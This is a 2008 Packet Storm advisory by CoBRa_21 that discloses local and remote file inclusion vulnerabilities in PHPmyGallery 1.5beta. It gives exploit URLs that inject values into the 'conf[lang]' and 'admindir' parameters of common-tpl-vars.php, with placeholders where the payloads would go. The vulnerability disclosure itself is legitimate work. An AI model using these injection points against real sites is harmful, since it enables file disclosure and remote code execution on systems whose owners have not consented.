PHPmyGallery 1.5beta LFI / RFI Vulnerabilities

2008-12-09T00:00:00
ID PACKETSTORM:72798
Type packetstorm
Reporter CoBRa_21
Modified 2008-12-09T00:00:00

Description

                                        
                                            `*****************************************************************************************  
  
Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities  
  
*****************************************************************************************  
  
Script Name: Phpmygallery  
  
Version: 1.5beta  
  
Autor: CoBRa_21  
  
My Site: www.ipbul.org  
  
Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip  
  
*****************************************************************************************  
  
Exploit:  
  
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFİ] (Windows Only)  
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]  
  
*****************************************************************************************  
  
Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun  
  
*****************************************************************************************  
  
`